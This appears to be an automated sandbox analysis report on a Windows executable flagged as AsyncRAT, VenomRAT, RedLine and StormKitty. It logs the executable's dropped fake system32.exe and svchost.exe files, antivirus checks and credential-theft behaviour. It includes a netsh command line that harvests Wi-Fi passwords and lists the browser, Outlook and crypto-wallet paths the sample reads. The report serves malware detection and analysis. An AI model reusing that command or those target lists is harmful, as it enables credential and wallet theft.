Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Queries volume information: C:\Users\user\AppData\Roaming\system32.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.31d6f70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.svchost.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2291428611.0000000003183000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.2259349303.0000000000162000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VzhY4BcvBH.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: VzhY4BcvBH.exe, 00000000.00000002.2291428611.0000000003183000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.2259349303.0000000000162000.00000002.00000001.01000000.00000009.sdmp, svchost.exe.0.dr	Binary or memory string: MSASCui.exe
Source: VzhY4BcvBH.exe, 00000000.00000002.2291428611.0000000003183000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.2259349303.0000000000162000.00000002.00000001.01000000.00000009.sdmp, svchost.exe.0.dr	Binary or memory string: procexp.exe
Source: system32.exe, 00000005.00000002.2364663376.0000000006439000.00000004.00000020.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2370448635.0000000007408000.00000004.00000020.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2370656237.000000000742A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: VzhY4BcvBH.exe, 00000000.00000002.2291428611.0000000003183000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.2259349303.0000000000162000.00000002.00000001.01000000.00000009.sdmp, svchost.exe.0.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\AppData\Roaming\system32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\system32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\system32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\system32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\system32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\system32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected BrowserPasswordDump

Source: Yara match	File source: 10.2.svchost.exe.1d540000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.1d540000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.0.system32.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.131a1be0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.131a1be0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2291428611.00000000036A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VzhY4BcvBH.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: system32.exe PID: 5560, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\system32.exe, type: DROPPED

Yara detected StormKitty Stealer

Source: Yara match	File source: 10.2.svchost.exe.1d540000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.1d540000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: VzhY4BcvBH.exe, 00000000.00000002.2291428611.00000000036A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumRule
Source: system32.exe, 00000005.00000002.2330152989.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $sq2C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: VzhY4BcvBH.exe, 00000000.00000002.2291428611.00000000036A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxxLibertyAfihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: VzhY4BcvBH.exe, 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: system32.exe, 00000005.00000002.2330152989.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: VzhY4BcvBH.exe, 00000000.00000002.2291428611.00000000036A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusRule
Source: system32.exe, 00000005.00000002.2330152989.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets
Source: system32.exe, 00000005.00000002.2330152989.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $sq6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: powershell.exe, 00000002.00000002.2116320438.000001ED902A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Roaming\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Roaming\system32.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 5.0.system32.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.131a1be0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.131a1be0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.1d860000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.1d860000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.1d540000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.1d540000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2291428611.00000000036A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4528103199.000000001D860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VzhY4BcvBH.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: system32.exe PID: 5560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\system32.exe, type: DROPPED

Remote Access Functionality

Yara detected BrowserPasswordDump

Source: Yara match	File source: 10.2.svchost.exe.1d540000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.1d540000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.0.system32.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.131a1be0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.131a1be0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2291428611.00000000036A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VzhY4BcvBH.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: system32.exe PID: 5560, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\system32.exe, type: DROPPED

Yara detected StormKitty Stealer

Source: Yara match	File source: 10.2.svchost.exe.1d540000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.1d540000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Native API	2 Scheduled Task/Job	112 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	225 System Information Discovery	Remote Desktop Protocol	3 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
